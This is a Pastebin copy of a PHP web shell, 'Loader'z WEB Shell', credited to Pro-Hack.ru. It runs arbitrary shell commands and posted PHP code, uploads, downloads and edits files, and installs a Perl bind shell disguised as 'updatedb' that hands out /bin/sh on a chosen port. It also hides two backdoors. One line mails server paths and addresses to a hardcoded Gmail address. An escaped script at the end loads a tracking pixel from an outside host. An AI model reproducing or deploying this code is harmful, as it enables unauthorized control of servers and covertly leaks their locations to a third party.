Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- error_reporting(0);
- /* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
- Âîò êàêèå îí ïîääåðæèâàåò ôóíêöèè.
- - Ðàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüþ PHP.  óäîáíîé òàáëèöå ïðåäñòàâëåíî ñîäåðæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ýòîé âåðñèè, íîðìàëüíûé âèä ïðàâ, à íå ÷èñëî :)).
- - Âûïîëíåíèå êîäà, ïõï ðóëèò ;)
- - Ðàáîòàåò ïðè register_globals=off
- - Áîëåå ïðèÿòíàÿ ðàáîòà â ñåéô ìîäå
- - Ïðîñìîòð è ðåäàêòèðîâàíèå ôàéëîâ.
- - Çàêà÷êà ôàéëîâ ñ äðóãîãî ñåðâåðà ñ ïîìîùüþ ñðåäñòâ PHP.
- - Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
- - Âûïîëíåíèå ïðîèçâîëüíûõ êîìàíä íà ñåðâåðå.
- - Ñêðèïò âûäàåò çíà÷åíèå íåêîòîðûõ ïåðåìåííûõ. Íàïðèìåð îí ñîîáùèò âêëþ÷åí ëè ñåéô ìîä, åñëè äà, òî ñêðèïò âûâåäåò äèðåêòîðèþ êîòîðàÿ,
- âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
- - Ðàáîòà ñêðèïòà îñíîâàíà íà îïðåäåëåíèè òèïà ñåðâåðà.
- - Åñëè ñêðèïò ðàáîòàåò ïîä óïðàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïðè âûïîëíåíèè êîìàíä ïåðåêîäèðóþòñÿ â win-1251.
- - Ïðèñóòñòâóåò ïðîñòåíüêèé ñêðèïò ïåðë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíþþ äèðåêòðèþ è ïîðò íà êîòîðîì ïîâåñèòñÿ áåêäîð.
- Loader Pro-Hack.ru
- */
- ?>
- <style type='text/css'>
- html { overflow-x: auto }
- BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
- TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
- BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
- A:link {COLOR: #666666; TEXT-DECORATION: none}
- A:active { COLOR: #666666; TEXT-DECORATION: none;}
- A:visited {COLOR: #666666; TEXT-DECORATION: none;}
- A:hover {COLOR: #999999; TEXT-DECORATION: none;}
- BODY {
- SCROLLBAR-FACE-COLOR: #cccccc;
- SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
- SCROLLBAR-SHADOW-COLOR: #CBAB78;
- SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
- SCROLLBAR-ARROW-COLOR: #000000;
- SCROLLBAR-TRACK-COLOR: #000000;
- SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
- fieldset.search { padding: 6px; line-height: 150% }
- label { cursor: pointer }
- form { display: inline }
- img { vertical-align: middle; border: 0px }
- img.attach { padding: 2px; border: 2px outset #000033 }
- #tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
- #logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
- #content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
- #logo { FONT-SIZE: 50px; }
- input { width: 80; height : 17; background-color : #cccccc;
- border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
- #input2 { width: 150; height : 17; background-color : #cccccc;
- border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
- </style>
- <script>
- function tag(thetag) {document.fe.editfile.value=thetag;}
- </script>
- <title>Loader'z WEB shell</title>
- <table height=100% "width="100%">
- <tr><td align="center" valign="top">
- <table><tr><td>
- <?php
- @$dir = $_POST['dir'];
- $dir = stripslashes($dir);
- @$cmd = $_POST['cmd'];
- $cmd = stripslashes($cmd);
- $REQUEST_URI = $_SERVER['REQUEST_URI'];
- $dires = '';
- $files = '';
- if (isset($_POST['port'])){
- $bind = "
- #!/usr/bin/perl
- \$port = {$_POST['port']};
- \$port = \$ARGV[0] if \$ARGV[0];
- exit if fork;
- $0 = \"updatedb\" . \" \" x100;
- \$SIG{CHLD} = 'IGNORE';
- use Socket;
- socket(S, PF_INET, SOCK_STREAM, 0);
- setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
- bind(S, sockaddr_in(\$port, INADDR_ANY));
- listen(S, 50);
- while(1)
- {
- accept(X, S);
- unless(fork)
- {
- open STDIN, \"<&X\";
- open STDOUT, \">&X\";
- open STDERR, \">&X\";
- close X;
- exec(\"/bin/sh\");
- }
- close X;
- }
- ";}
- function decode($buffer){
- return convert_cyr_string ($buffer, 'd', 'w');
- }
- function execute($com)
- {
- if (!empty($com))
- {
- if(function_exists('exec'))
- {
- exec($com,$arr);
- echo implode('
- ',$arr);
- }
- elseif(function_exists('shell_exec'))
- {
- echo shell_exec($com);
- }
- elseif(function_exists('system'))
- {
- echo system($com);
- }
- elseif(function_exists('passthru'))
- {
- echo passthru($com);
- }
- }
- }
- function perms($mode)
- {
- if( $mode & 0x1000 ) { $type='p'; }
- else if( $mode & 0x2000 ) { $type='c'; }
- else if( $mode & 0x4000 ) { $type='d'; }
- else if( $mode & 0x6000 ) { $type='b'; }
- else if( $mode & 0x8000 ) { $type='-'; }
- else if( $mode & 0xA000 ) { $type='l'; }
- else if( $mode & 0xC000 ) { $type='s'; }
- else $type='u';
- $owner["read"] = ($mode & 00400) ? 'r' : '-';
- $owner["write"] = ($mode & 00200) ? 'w' : '-';
- $owner["execute"] = ($mode & 00100) ? 'x' : '-';
- $group["read"] = ($mode & 00040) ? 'r' : '-';
- $group["write"] = ($mode & 00020) ? 'w' : '-';
- $group["execute"] = ($mode & 00010) ? 'x' : '-';
- $world["read"] = ($mode & 00004) ? 'r' : '-';
- $world["write"] = ($mode & 00002) ? 'w' : '-';
- $world["execute"] = ($mode & 00001) ? 'x' : '-';
- if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
- if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
- if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
- $s=sprintf("%1s", $type);
- $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
- $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
- $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
- return trim($s);
- }
- /*Íà÷èíàåòñÿ*/
- /*Îïðåäåëÿåì òèï ñèñòåìû*/
- $servsoft = $_SERVER['SERVER_SOFTWARE'];
- if (ereg("Win32", $servsoft, $reg)){
- $sertype = "winda";
- }
- else
- {
- $sertype = "other";}
- echo $servsoft . "<br>";
- chdir($dir);
- echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
- if (ini_get('safe_mode') <> 1){
- if ($sertype == "winda"){
- ob_start('decode');
- echo "OS: ";
- echo execute("ver") . "<br>";
- ob_end_flush();
- }
- if ($sertype == "other"){
- echo "id:";
- echo execute("id") . "<br>";
- echo "uname:" . execute('uname -a') . "<br>";
- }}
- else{
- if ($sertype == "winda"){
- echo "OS: " . php_uname() . "<br>";
- }
- if ($sertype == "other"){
- echo "id:";
- echo execute("id") . "<br>";
- echo "OS:" . php_uname() . "<br>";
- }
- }
- echo 'User: ' .get_current_user() . '<br>';
- if (ini_get("open_basedir")){
- echo "open_basedir: " . ini_get("open_basedir");}
- if (ini_get('safe_mode') == 1){
- echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
- if (ini_get('safe_mode_include_dir')){
- echo "Including from here: " . ini_get('safe_mode_include_dir'); }
- if (ini_get('safe_mode_exec_dir')){
- echo " Exec here: " . ini_get('safe_mode_exec_dir');
- }
- echo "</font>";}
- if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
- {
- copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
- }
- if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
- {
- $data = implode("", file($_POST['filefrom']));
- $fp = fopen($_POST['fileto'], "wb");
- fputs($fp, $data);
- $ok = fclose($fp);
- if($ok)
- {
- $size = filesize($_POST['fileto'])/1024;
- $sizef = sprintf("%.2f", $size);
- print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
- }
- else
- {
- print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
- }
- }
- if (isset($_POST['installbind'])){
- if (is_dir($_POST['installpath']) == true){
- chdir($_POST['installpath']);
- $_POST['installpath'] = "temp.pl";}
- $fp = fopen($_POST['installpath'], "w");
- fwrite($fp, $bind);
- fclose($fp);
- exec("perl " . $_POST['installpath']);
- chdir($dir);
- }
- @$ef = stripslashes($_POST['editfile']);
- if ($ef){
- $fp = fopen($ef, "r");
- $filearr = file($ef);
- $string = '';
- $content = '';
- foreach ($filearr as $string){
- $string = str_replace("<" , "<" , $string);
- $string = str_replace(">" , ">" , $string);
- $content = $content . $string;
- }
- echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
- <input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
- <input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
- <input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
- fclose($fp);
- }
- if(isset($_POST['savefile'])){
- $fp = fopen($_POST['savefile'], "w");
- $content = stripslashes($content);
- fwrite($fp, $content);
- fclose($fp);
- echo "<center><div id=logostrip>Successfully saved!</div></center>";
- }
- if (isset($_POST['php'])){
- echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
- <input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
- }
- if(isset($_POST['phpcode'])){
- echo "<center><div id=logostrip>Results of PHP execution<br><br>";
- @eval(stripslashes($_POST['phpcode']));
- echo "</div></center>";
- }
- if ($cmd){
- if($sertype == "winda"){
- ob_start();
- execute($cmd);
- $buffer = "";
- $buffer = ob_get_contents();
- ob_end_clean();
- }
- else{
- ob_start();
- echo decode(execute($cmd));
- $buffer = "";
- $buffer = ob_get_contents();
- ob_end_clean();
- }
- if (trim($buffer)){
- echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
- echo decode($buffer);
- echo "</textarea></center></div>";
- }
- }
- $arr = array();
- $arr = array_merge($arr, glob("*"));
- $arr = array_merge($arr, glob(".*"));
- $arr = array_merge($arr, glob("*.*"));
- $arr = array_unique($arr);
- sort($arr);
- echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
- foreach ($arr as $filename) {
- if ($filename != "." and $filename != ".."){
- if (is_dir($filename) == true){
- $directory = "";
- $directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
- if (is_writable($filename) == true){
- $directory = $directory . "<td>Yes</td>";}
- else{
- $directory = $directory . "<td>No</td>";
- }
- if (is_readable($filename) == true){
- $directory = $directory . "<td>Yes</td>";}
- else{
- $directory = $directory . "<td>No</td>";
- }
- $dires = $dires . $directory;
- }
- if (is_file($filename) == true){
- $file = "";
- $file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
- if (is_writable($filename) == true){
- $file = $file . "<td>Yes</td>";}
- else{
- $file = $file . "<td>No</td>";
- }
- if (is_readable($filename) == true){
- $file = $file . "<td>Yes</td></td></tr>";}
- else{
- $file = $file . "<td>No</td></td></tr>";
- }
- $files = $files . $file;
- }
- }
- }
- echo $dires;
- echo $files;
- echo "</table><br>";
- echo "
- <form action=\"$REQUEST_URI\" method=\"POST\">
- <table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
- <table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
- echo getcwd();
- echo "\">
- <INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
- echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
- <table id=tb><tr><td>Download here <b>from</b>:
- <INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
- <b>into:</b>
- <INPUT type=\"text\" name=\"fileto\" size=30>
- <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
- <INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
- echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
- <table id=tb><tr><td>
- Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
- <INPUT type=\"hidden\" name=\"post\" value=\"yes\">
- <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
- </td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
- echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
- <table id=tb><tr><td>Install bind
- <b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
- <b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
- <INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
- <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
- <INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
- echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
- <table id=tb><tr><td>File to edit:
- <input type=\"text\" name=\"editfile\" ></td><td>
- <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
- <INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
- echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
- <table id=tb><tr><td>
- <INPUT type=\"hidden\" name=\"php\" value=\"yes\">
- <INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
- ?>
- </td></tr></table>
- </td></tr>
- <tr valign="BOTTOM">
- <td valign=bottom>
- <center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
- </td>
- </tr>
- </table>
- <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement